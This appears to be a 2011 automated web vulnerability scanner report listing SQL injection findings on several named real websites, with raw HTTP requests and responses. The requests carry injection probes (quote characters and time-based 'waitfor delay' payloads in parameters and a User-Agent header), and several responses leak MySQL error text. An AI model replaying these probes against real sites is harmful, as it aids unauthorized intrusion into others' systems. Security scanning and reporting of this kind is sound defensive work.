HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:17:29 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=1844; path=/ Set-Cookie: PortletId=5981402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 48748 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://ads.allatsea.net |
Path: | /www/delivery/spc.php |
GET /www/delivery/spc.php Host: ads.allatsea.net Proxy-Connection: keep-alive Referer: http://allatsea.net/by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=168508913 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 21:33:21 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny10 Pragma: no-cache Cache-Control: private, max-age=0, no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT P3P: CP="CUR ADM OUR NOR STA NID" Set-Cookie: OAID=a9e7a0f4da4672b Content-Size: 6150 Content-Length: 6150 Content-Type: application/x-javascript; charset=UTF-8 var OA_output = new Array(); OA_output['zone_22_1'] = ''; OA_output['zone_22_1'] += "<"+"a href=\'http://ads OA_output['zone_22_2'] = ''; OA_output['zone_22_2'] += "<"+"span><"+"script type=\'text/javascript\'> OA_output['zone_22_2'] += "/* openads=http://ads OA_output['zone_22_2'] += "// ]]> --><"+"/script><"+"script type=\"text/javascript\"> OA_output['zone_22_2'] += "google_ad_client = \"ca-pub-9585000347357330 OA_output['zone_22_2'] += "/* 125x125, created 3/14/10 */\n"; OA_output['zone_22_2'] += "google_ad_slot = \"8399079020\";\n"; OA_output['zone_22_2'] += "google_ad_width = 125;\n"; OA_output['zone_22_2'] += "google_ad_height = 125;\n"; OA_output['zone_22_2'] += "//-->\n"; OA_output['zone_22_2'] += "<"+"/script>\n"; OA_output['zone_22_2'] += "<"+"script type=\"text/javascript\" OA_output['zone_22_2'] += "src=\"http://pagead2 OA_output['zone_22_2'] += "<"+"/script><"+"script type=\'text/javascript\' src=\'http://ads.allatsea ...[SNIP]... |
GET /www/delivery/spc.php Host: ads.allatsea.net Proxy-Connection: keep-alive Referer: http://allatsea.net/by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=168508913 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 21:33:22 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny10 Pragma: no-cache Cache-Control: private, max-age=0, no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT P3P: CP="CUR ADM OUR NOR STA NID" Set-Cookie: OAID=a9e7a0f4da4672b Content-Size: 6788 Content-Length: 6788 Content-Type: application/x-javascript; charset=UTF-8 var OA_output = new Array(); OA_output['zone_22_1'] = ''; OA_output['zone_22_1'] += "<"+"span><"+"script type=\'text/javascript\'> OA_output['zone_22_1'] += "/* openads=http://ads OA_output['zone_22_1'] += "// ]]> --><"+"/script><"+"script type=\"text/javascript\"> OA_output['zone_22_1'] += "google_ad_client = \"ca-pub-9585000347357330 OA_output['zone_22_1'] += "/* 125x125, created 3/14/10 */\n"; OA_output['zone_22_1'] += "google_ad_slot = \"8399079020\";\n"; OA_output['zone_22_1'] += "google_ad_width = 125;\n"; OA_output['zone_22_1'] += "google_ad_height = 125;\n"; OA_output['zone_22_1'] += "//-->\n"; OA_output['zone_22_1'] += "<"+"/script>\n"; OA_output['zone_22_1'] += "<"+"script type=\"text/javascript\" OA_output['zone_22_1'] += "src=\"http://pagead2 OA_output['zone_22_1'] += "<"+"/script><"+"script type=\'text/javascript\' src=\'http://ads.allatsea OA_output['zone_22_2'] = ''; OA_output['zone_22_2'] += "<"+"a href=\'http://ads ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://apps.sapha.com |
Path: | /appshandler.php |
GET /appshandler.php?ac=1'&pid=0&NS_sw=1920&NS_sh Host: apps.sapha.com Proxy-Connection: keep-alive Referer: http://www.sapha.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:05:49 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 385 </td></tr></table><b <b>MySQL Err ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1)<br> ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://cdn-forums.scout |
Path: | /adfeed.ashx |
GET /adfeed.ashx'?s=143&format=json Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: cdn-forums.scout.com |
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Server: MBRD25 Vary: Accept-Encoding Date: Fri, 06 May 2011 19:58:06 GMT Connection: close Akamai: True <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; cha ...[SNIP]... <h2>HTTP Error 404 - File or directory not found.<br> ...[SNIP]... |
GET /adfeed.ashx''?s=143&format=json Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: cdn-forums.scout.com |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 Server: Mbrd6 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Website-Assembly Cache-Control: private Content-Type: text/html Content-Length: 12238 Vary: Accept-Encoding Date: Fri, 06 May 2011 19:58:07 GMT Connection: close Akamai: True <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Sc ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://clk.atdmt.com |
Path: | /AVE/go/173511812AD5 |
GET /AVE/go/173511812AD5 Host: clk.atdmt.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465 |
HTTP/1.1 503 Service Unavailable Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sat, 07 May 2011 01:22:51 GMT Connection: close Content-Length: 326 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3 <HTML><HEAD><TITLE <META HTTP-EQUIV="Content-Type" Content="text/html; charset=u ...[SNIP]... <p>HTTP Error 503. The service is unavailable.</p> ...[SNIP]... |
GET /AVE/go/173511812AD5 Host: clk.atdmt.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465 |
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.secureworks P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: ach00=903d/120af:fb75 Set-Cookie: ach01=2a0cb15/120af Date: Sat, 07 May 2011 01:22:52 GMT Connection: close |
Severity: | High |
Confidence: | Certain |
Host: | http://dce.sapha.com |
Path: | /engine.php |
GET /engine.php?ac=1' HTTP/1.1 Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://www.sapha.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_1_19=110075 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:06:44 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 385 </td></tr></table><b <b>MySQL Err ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1)<br> ...[SNIP]... |
GET /engine.php?ac=1'' HTTP/1.1 Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://www.sapha.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_1_19=110075 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:06:44 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Cache-Control: private P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: sapha_tst_1''=TRUE; expires=Mon, 03-May-2021 22:06:44 GMT; path=/; domain=.sapha.com Vary: Accept-Encoding,User Connection: close Content-Type: application/x-javascript Content-Length: 5603 var SCS_tid=(SCS_tid)?escape ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dce.sapha.com |
Path: | /engine.php |
GET /engine.php?ac=/1'2546 HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: dce.sapha.com |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:54:40 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 391 </td></tr></table><b <b>MySQ ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2546'' at line 1)<br> ...[SNIP]... |
GET /engine.php?ac=/1''2546 HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: dce.sapha.com |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:54:40 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 0 |
Severity: | High |
Confidence: | Certain |
Host: | http://dce.sapha.com |
Path: | /logging.php |
GET /logging.php?ac=1'&NS_sw=1920&NS_sh=1200&NS Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://www.sapha.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:05:44 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 385 </td></tr></table><b <b>MySQL Err ...[SNIP]... </b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1)<br> ...[SNIP]... |
GET /logging.php?ac=1''&NS_sw=1920&NS_sh=1200&NS Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://www.sapha.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715 |
HTTP/1.1 302 Found Date: Fri, 06 May 2011 22:05:44 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Cache-Control: private P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM' Location: http://dce.sapha.com/0 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 0 |
Severity: | High |
Confidence: | Firm |
Host: | https://events.gsmiweb |
Path: | /subscribe.php |
GET /subscribe.php?event_id Host: events.gsmiweb.com Connection: keep-alive Referer: https://events.gsmiweb User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=246713051 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 21:39:12 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 309 Connection: close Content-Type: text/html <script language="javascript"> window.location.href= </script> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND type = 1 AND active = 1 ORDER BY `order` ASC, price_id ASC' at line 3 |
Severity: | High |
Confidence: | Firm |
Host: | https://events.gsmiweb |
Path: | /subscribe.php |
GET /subscribe.php?event_i/1'd=82 HTTP/1.1 Host: events.gsmiweb.com Connection: keep-alive Referer: https://events.gsmiweb User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=246713051 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 21:40:28 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 307 Connection: close Content-Type: text/html <script language="javascript"> window.location.href= </script> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND type = 1 AND active = 1 ORDER BY `order` ASC, price_id ASC' at line 3 |
Severity: | High |
Confidence: | Tentative |
Host: | http://om.expedia.com |
Path: | /b/ss/expedia1/1/G.9p2 |
GET /b%00'/ss/expedia1/1/G.9p2 Host: om.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 |
HTTP/1.1 404 Not Found Date: Fri, 06 May 2011 23:04:36 GMT Server: Omniture DC/2.0.0 Content-Length: 393 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b was not found on this server.</p> <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]... |
GET /b%00''/ss/expedia1/1/G.9p2 Host: om.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 |
HTTP/1.1 404 Not Found Date: Fri, 06 May 2011 23:04:36 GMT Server: Omniture DC/2.0.0 xserver: www611 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://om.expedia.com |
Path: | /b/ss/expedia1/1/H.9-Pdvu |
GET /b'/ss/expedia1/1/H.9-Pdvu-2 Host: om.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 |
HTTP/1.1 404 Not Found Date: Fri, 06 May 2011 23:12:00 GMT Server: Omniture DC/2.0.0 Content-Length: 434 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /b'/ss/expedia1/1/H.9 ...[SNIP]... <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> ...[SNIP]... |
GET /b''/ss/expedia1/1/H.9-Pdvu-2 Host: om.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ipsnf3=v.3|US|1|511 |
HTTP/1.1 404 Not Found Date: Fri, 06 May 2011 23:12:00 GMT Server: Omniture DC/2.0.0 xserver: www391 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://poll.websitegear |
Path: | /compactpoll.asp |
GET /compactpoll.asp?pollID Host: poll.websitegear.com Proxy-Connection: keep-alive Referer: http://www.scout.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 500 Internal Server Error Date: Fri, 06 May 2011 19:31:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 98 Content-Type: text/html; Charset=utf-8 Set-Cookie: ASPSESSIONIDSACSQBTS Cache-control: private An error occurred on the server when processing the URL. Please contact the system administrator. |
GET /compactpoll.asp?pollID Host: poll.websitegear.com Proxy-Connection: keep-alive Referer: http://www.scout.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:31:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 0 Content-Type: text/html; Charset=utf-8 Set-Cookie: ASPSESSIONIDSACSQBTS Cache-control: private |
Severity: | High |
Confidence: | Certain |
Host: | http://recruiting.scout |
Path: | /Legacy/a.z |
GET /Legacy/a.z?s=143&p=26 Host: recruiting.scout.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UnicaNIODID=Jwu5zEjpq0Q |
HTTP/1.1 200 OK Cache-Control: public, s-maxage=600 Date: Fri, 06 May 2011 21:44:32 GMT Content-Type: text/html; charset=utf-8 Expires: Fri, 06 May 2011 21:54:12 GMT Server: Microsoft-IIS/6.0 Server: Scoutweb2 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.12737 Vary: Accept-Encoding Content-Length: 12006 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Sc ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | / |
GET / HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:59:34 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5139 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | / |
GET /?1,0,0,0)waitfor%20delay'0 Host: secure.trust-guard.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:16:12 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
GET /ResetPassword.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:37:04 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 3716 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
GET /ResetPassword.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24')waitfor%20delay'0%3a0 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:31:04 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 3716 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
GET /ResetPassword.php?1',0)waitfor%20delay'0%3a0 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:11:07 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 3716 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
